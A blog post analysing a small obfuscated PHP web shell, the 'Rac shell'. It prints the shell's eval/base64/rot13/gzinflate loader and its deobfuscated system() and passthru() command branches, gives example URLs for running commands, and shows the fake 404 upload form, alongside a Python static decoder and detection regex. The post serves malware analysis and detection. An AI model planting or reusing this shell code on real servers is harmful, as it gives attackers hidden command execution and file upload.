Reversing the Rac shell

The Rac shell is quite a small shell with basic code execution and file upload capabilities. A good candidate to start with if you want to practice PHP reversing.

Below is the original code:

<?php if(isset($_GET["letmein"])){$fck="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";eval(str_rot13(gzinflate(str_rot13(base64_decode($fck)))));}

The malware starts by checking whether the "letmein" parameter is set; if so, it evaluates the obfuscated string. Before evaluating (executing) it, the malware decodes the string by chaining base64 decoding, rot13, gzinflate (DEFLATE decompression) and finally another rot13.
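The same chain can be unwrapped statically, without ever handing the blob to eval. The Python below is an added example for this post (not code from the shell or its author): it inverts the chain step by step and also matches the loader pattern in a PHP file, which doubles as a simple detection rule. The embedded PHP sample is constructed for the demonstration, and the regex and function names are my own assumptions.

```python
import base64
import re
import zlib
from typing import Optional

def rot13_bytes(data: bytes) -> bytes:
    """Byte-level ROT13 matching PHP str_rot13(): only ASCII letters rotate."""
    out = bytearray()
    for b in data:
        if 65 <= b <= 90:
            out.append((b - 65 + 13) % 26 + 65)
        elif 97 <= b <= 122:
            out.append((b - 97 + 13) % 26 + 97)
        else:
            out.append(b)
    return bytes(out)

def raw_deflate(data: bytes) -> bytes:
    """Emulate PHP gzdeflate(): raw DEFLATE stream, no zlib/gzip header."""
    c = zlib.compressobj(level=9, wbits=-15)
    return c.compress(data) + c.flush()

def raw_inflate(data: bytes) -> bytes:
    """Emulate PHP gzinflate(): inflate a raw DEFLATE stream."""
    return zlib.decompress(data, wbits=-15)

def pack_rac(plain: bytes) -> str:
    """Forward obfuscation (rot13 -> deflate -> rot13 -> base64); used only to build a sample."""
    return base64.b64encode(rot13_bytes(raw_deflate(rot13_bytes(plain)))).decode()

def unpack_rac(blob: str) -> bytes:
    """Static decode: base64 -> rot13 -> inflate -> rot13. Nothing is executed."""
    return rot13_bytes(raw_inflate(rot13_bytes(base64.b64decode(blob))))

# Loader signature: eval(str_rot13(gzinflate(str_rot13(base64_decode($var))))) (assumed regex).
LOADER_RE = re.compile(r'eval\(str_rot13\(gzinflate\(str_rot13\(base64_decode\(\$(\w+)\)\)\)\)\)')

def extract_payload(php_source: str) -> Optional[bytes]:
    """Find the loader, locate the variable it decodes, and return the decoded payload."""
    m = LOADER_RE.search(php_source)
    if not m:
        return None
    assign = re.search(r'\$' + re.escape(m.group(1)) + r'\s*=\s*"([A-Za-z0-9+/=]+)"', php_source)
    return unpack_rac(assign.group(1)) if assign else None

# Constructed sample: a tiny stand-in for the real inner code, wrapped like the shell wraps it.
SAMPLE_INNER = b"if(isset($_REQUEST['racsys'])){system($_REQUEST['racsys']);die;}"
SAMPLE_FILE = ('<?php if(isset($_GET["letmein"])){$fck="' + pack_rac(SAMPLE_INNER)
               + '";eval(str_rot13(gzinflate(str_rot13(base64_decode($fck)))));}')
```

Running extract_payload over the constructed SAMPLE_FILE returns SAMPLE_INNER; point it at a real Rac sample to get the if-elseif-else tree discussed in this post.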

By deobfuscating the code we get a big if-elseif-else tree with options like:

elseif(isset($_REQUEST['racsys'])){
	// "racsys" branch: the raw request value is passed to system()
	echo '<title>'.$_REQUEST['racsys'].'</title><pre>';
	$indexs = ($_REQUEST['racsys']);
	system($indexs);
	die;
}
elseif(isset($_REQUEST['racpass'])){
	// "racpass" branch: same idea, but via passthru()
	echo '<title>'.$_REQUEST['racpass'].'</title><pre>';
	$indexp = ($_REQUEST['racpass']);
	passthru($indexp);
	die;
}

This means that using a query like rac.php?letmein=1&racsys=ls would pass ls to the system command.

If you instead use rac.php?letmein=1&rac=1, it will generate a form for file upload on a "404" page, as shown below.

<html>
<head>
<title>404 Not Found</title>
</head>
<body><center>
<form method=POST enctype="multipart/form-data" action="">
<input type=text name=path>
<input type="file" name="files[]" multiple="multiple">
<input type=submit value="Up">
</form></center>
</body>
</html>

Finally, if only rac.php?letmein=1 is used, the code answers with "No direct script access allowed". This might be helpful for finding other similar shells in a black-box environment.

Have you seen any interesting PHP malware in the wild? I'd be happy to take a look! Send me an email at benjamin@beneri.se